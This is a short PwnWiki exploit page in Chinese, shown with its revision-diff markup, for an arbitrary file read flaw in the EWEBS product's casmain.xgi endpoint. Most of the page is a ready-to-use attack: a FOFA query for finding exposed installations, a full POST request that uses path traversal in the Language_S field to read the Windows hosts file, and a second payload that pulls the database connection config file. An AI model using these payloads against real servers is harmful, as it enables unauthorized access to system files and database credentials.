Difference between revisions of "極通EWEBS casmain.xgi 任意文件讀取漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==漏洞影響== <!--T:1--> <!--T:2--> 極通EWEBS </translate> ==FOFA== <pre> app="新软科技-极通EWEBS" </pre> ==POC== <translate> 漏洞...") |
(Marked this version for translation) |
||
| Line 15: | Line 15: | ||
<translate> | <translate> | ||
| + | <!--T:3--> | ||
漏洞請求包爲: | 漏洞請求包爲: | ||
</translate> | </translate> | ||
| Line 30: | Line 31: | ||
<translate> | <translate> | ||
| + | <!--T:4--> | ||
可以配合 testweb.php 信息泄漏讀取敏感信息 | 可以配合 testweb.php 信息泄漏讀取敏感信息 | ||
</translate> | </translate> | ||
Latest revision as of 17:49, 18 June 2021
漏洞影響
極通EWEBS
FOFA
app="新软科技-极通EWEBS"
POC
漏洞請求包爲:
POST /casmain.xgi HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: PHPSESSID=923b86fa90ce1e14c82d4e36d1adc528; CookieLanguageName=ZH-CN Content-Length: 57 Language_S=../../../../windows/system32/drivers/etc/hosts
可以配合 testweb.php 信息泄漏讀取敏感信息
Language_S=../../Data/CONFIG/CasDbCnn.dat